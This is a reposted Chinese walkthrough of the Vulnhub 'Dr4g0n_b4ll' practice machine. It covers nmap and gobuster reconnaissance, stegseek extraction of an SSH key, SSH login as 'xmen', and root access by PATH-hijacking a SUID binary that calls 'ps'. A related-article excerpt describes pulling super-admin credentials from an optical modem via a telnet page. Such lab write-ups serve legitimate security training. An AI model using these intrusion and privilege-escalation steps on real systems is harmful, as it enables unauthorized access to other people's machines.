【Vulnhub系列】Vulnhub_Dr4g0n_b4ll 靶场渗透(原创)

news2024/11/25 6:40:02

【Vulnhub系列靶场】Vulnhub_Dr4g0n_b4ll靶场渗透

原文转载已经过授权
原文链接:Lusen的小窝 - 学无止尽,不进则退 (lusensec.github.io)

一、环境搭建

选择打开.ovf 文件

image-20240224152423286

配置名称和路径

image-20240224152402352

打开后调整网络连接模式为【NAT】即可

二、信息收集

1、主机发现

nmap.exe -sn 192.168.31.*

image-20240224135014762

2、端口扫描

1、快速粗略的端口扫描

nmap.exe -F 192.168.31.65
image-20240224135148134

2、详细端口扫描

nmap.exe -sT --min-rate 10000 -p- 192.168.31.65
nmap.exe -sU --min-rate 10000 -p- 192.168.31.65

image-20240224135658689

3、详细扫描和漏洞探测

nmap.exe -sV -A -p22,80 192.168.31.65

image-20240224135440463

nmap.exe --script=vuln -p22,80 192.168.31.65

image-20240224135500772

只发现了一个robots.txt 的文件

3、web 目录探测

gobuster.exe dir -u http://192.168.31.65 -w d:\theperson\dirs\dicc.txt -b 404,403 --no-error

image-20240224140201673

4、web 框架探测

whatweb http://192.168.31.65

image-20240224140522211

三、获取shell立足点

1、查看敏感信息

1、主页

image-20240224140723028

2、robots.txt 文件

image-20240224140817155

进行base64解码:

image-20240224140957715

3、源代码

image-20240224141117019

image-20240224141448789

2、DRAGON BALL目录信息

image-20240224142227549

1、secret.txt 文件

image-20240224142428287

保存下来做目录爆破

image-20240224143723348

并无收获

2、Vulnhub 目录

image-20240224143748924

3、Vulnhub/login.html:是一个虚假的登录页面

image-20240224143820482

4、aj.jpg:一张黑客的图片

image-20240224144139876

3、图片信息提取

提取图片隐写信息

stegseek aj.jpg /usr/share/wordlists/rockyou.txt
image-20240224150532499

image-20240224150607293

4、获取shell 立足点

此时拿到一个ssh密钥,欠缺用户名,此处的xmen 是用户名

image-20240224150858190

我们直接用密钥进行登录

ssh xmen@192.168.31.65 -i id_rsa

image-20240224150946067

成功拿到shell

四、提权至root

1、查看敏感文件

image-20240224151439588

shell 是一个suid权限,发现可以执行环境变量中的ps 命令,那么可以尝试用环境变量劫持来提权

2、提权至root

cd /tmp
echo "/bin/bash" > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH
cd ~/script
./script

image-20240224151818159

原文转载已经过授权
更多文章请访问原文链接:Lusen的小窝 - 学无止尽,不进则退 (lusensec.github.io)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1962803.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

MySQL安装教程(保姆级)

1. 首先要了解自己的计算机 打开设置——系统——系统信息 然后就可以知道自己计算机的类型了。 2. 下载MySQL 2.1. 来到MySQL官网 点击进入 我们下拉页面,可以找到DOWNLOADS 页面默认给咱们选择最新的版本,咱们不用,咱们尽量选一个稳定的版…

解决vscode+UE5中vscode无法识别头文件,无法函数无法跳转,也无法自动补全的问题。

一、概述 接上一条博客,虽然解决了报错的问题,但是实际上的问题却没有解决,无论我怎么点击,其都无法完成跳转,也无法完成自动补全的问题。 在网络上搜索了很多资料后,发现是在使用vscode时候UE5在vscode中的…

对零基础想转行网络安全同学的一点建议

最近有同学在后台留言,0基础怎么学网络安全?0基础可以转行做网络安全吗?以前也碰到过类似的问题,想了想,今天简单写一下。 我的回答是先了解,再入行。 具体怎么做呢? 首先,你要确…

深入源码:解析SpotBugs (5)BugReportor

常见的 Bug 定位后,通过 bugReport的reportBug(BugInstance) 方法,将bug 发布出来。 一般的 Detector 经检测后会调用 bugReportor.reportBug 方法或者 BugAccumulator.accumulateBug 。 在GUI中,分析结束后会在下框…

2024年投放必应bing国内广告,顶级技巧与策略!

随着企业对于高效、精准的广告投放需求日益增强,微软必应Bing广告平台以其独特的优势,正成为众多品牌投放广告的理想选择。云衔科技凭借其专业的必应Bing国内广告开户及代运营服务,助力企业精准触达目标受众,实现品牌影响力和市场…

ESP-ADF适配到自定义开发板中

ESP-ADF适配到自定义开发板中 前言:项目开发完了,来记录一下开发过程。 安装: 这里采用vscode+ESP-IDF+ESP-ADF的开发方式。 安装esp-idf的方法很简单,网上都是,这里不说了。想用esp-adf那么你idf的环境肯定是已经搭建好了。 安装adf也很简单,一步完成。 按下F1,选…

软考网工:2024年下半年各地区报名时间(附赠真题)

根据软考办《关于2024年度计算机技术与软件专业技术资格(水平)考试工作安排及有关事项的通知》(计考办〔2024〕1号)可以得知,2024年下半年网络工程师将于8月19日至9月15日开放考务管理服务平台,各地组织报名。 各地2024年下半年网络工程师报名时间不同&…

科普文:万字梳理高性能 Kafka快的8个原因

概叙 科普文:万字详解Kafka基本原理和应用-CSDN博客 科普文:万字梳理31个Kafka问题-CSDN博客 我们都知道 Kafka 是基于磁盘进行存储的,但 Kafka 官方又称其具有高性能、高吞吐、低延时的特点,其吞吐量动辄几十上百万。 在座的…

绝密!OceanBase OBCP备考模拟题讲解(1)

博主首页 : 「源de爸讲数据库」每天优先更新OceanBase OBCP题库及全网独家超详细题目解析! 现如今,一大批国产数据库随着国产化浪潮,已经逐步被越来越多的人认可。OceanBase便是其中一个优秀代表。 做这个日更专题,…

麒麟V10系统统一认证子系统国际化

在适配麒麟V10系统统一认证子系统国际化过程中, 遇到了很多的问题,关键是麒麟官方的文档对这部分也是粗略带过,遇到的问题有: (1)xgettext无法提取C源文件中目标待翻译的字符串。 (2)使用msgf…

【Python正则-驯化】一文学会通过Python中的正则表达式提取文本中的网址

【Python正则-驯化】一文学会通过Python中的正则表达式提取文本中的网址 本次修炼方法请往下查看 🌈 欢迎莅临我的个人主页 👈这里是我工作、学习、实践 IT领域、真诚分享 踩坑集合,智慧小天地! 🎇 免费获取相关内容…

Redis 与 Scrapy:无缝集成的分布式爬虫技术

1. 分布式爬虫的概念 分布式爬虫系统通过将任务分配给多个爬虫节点,利用集群的计算能力来提高数据抓取的效率。这种方式不仅可以提高爬取速度,还可以在单个节点发生故障时,通过其他节点继续完成任务,从而提高系统的稳定性和可靠性…

Gooxi荣获2024年深圳市计算机行业协会最具成长奖

近日,由深圳市计算机行业协会举办的2024年度深圳市计算机行业协会年中工作会议圆满落幕。本次会议邀请了多位行业专家以及深圳地区的理事会成员、企业家参会。会议的重点是总结上半年的经验,分析行业热点与痛点,探讨以新质生产力促进高质量发…

网络安全等级保护:上下文中的API安全性

网络安全等级保护:什么是API安全? 上下文中的API安全性 应用程序编程接口安全性位于多个安全学科的交叉点,如图所示。其中最重要的是以下三个领域: 1.信息安全(InfoSec)涉及在信息的整个生命周期中保护信…

Kettle下载安装

环境说明 虚拟机:Win7;MySql8.0 主机:Win11;JDK1.8;Kettle 9.4(Pentaho Data Integration 9.4)(下载方式见文末) 安装说明 【1】解压后运行Spoon.bat 【2】将jar包 复…

vue2学习 -- 核心语法

文章目录 前置简介1. 模板语法2. 数据2.1 数据绑定2.2 el与data的两种写法2.3 MVVM模型2.4 Object.defineProperty2.5 Vue中的数据代理 3. 事件3.1 事件处理3.2 事件修饰符3.3 键盘事件 4. 计算属性5. 监视(侦听)属性5.1 书写形式5.2 深度监视5.3 简写形式5.4 计算属性和监听属…

一「骑」就LUCKY!凯迪拉氪强劲动力,带你一路顺畅,幸运随行!

好运,其实就是毫不费劲的完成心里所想的事情。简单来说,是不需要太多努力,就能得到比较大的回报。每个人都希望自己拥有好运气,但这就跟抽盲盒一样,可能穷极一生都享受不到。 所以,与其期待虚无缥缈的好运…

Java线程阻塞:原因

Java线程阻塞:原因 1. sleep()2. suspend() 和 resume()(不推荐)3. yield()4. wait() 和 notify()/notifyAll() 💖The Begin💖点点关注,收藏不迷路💖 线程阻塞是一个重要的概念,它决…

移动光猫(UNG853H)获取超级帐号和密码

1.查看光猫背部的登录地址及帐密码;比如我的光猫: http://192.168.1.1 User: user password: ****** 2.启动telnet服务,使用以下命令: http://192.168.1.1/webcmcc/telnet.html 3.使用telnet登录光猫,在CMD下执行&…

【WRF安装第二期(Ubuntu)】搭建WRF编译所需系统-系统环境检验

WRF安装第二期:搭建WRF编译所需系统-系统环境检验 0 升级和安装基础环境1 系统环境检验(System Environment Tests)1.1 检验和安装基础包1.1.1 安装指令1.1.2 检验指令 1.2 WRF安装的目录结构1.2.1 WRF系统环境测试 1.3 测试编译器&#xff0…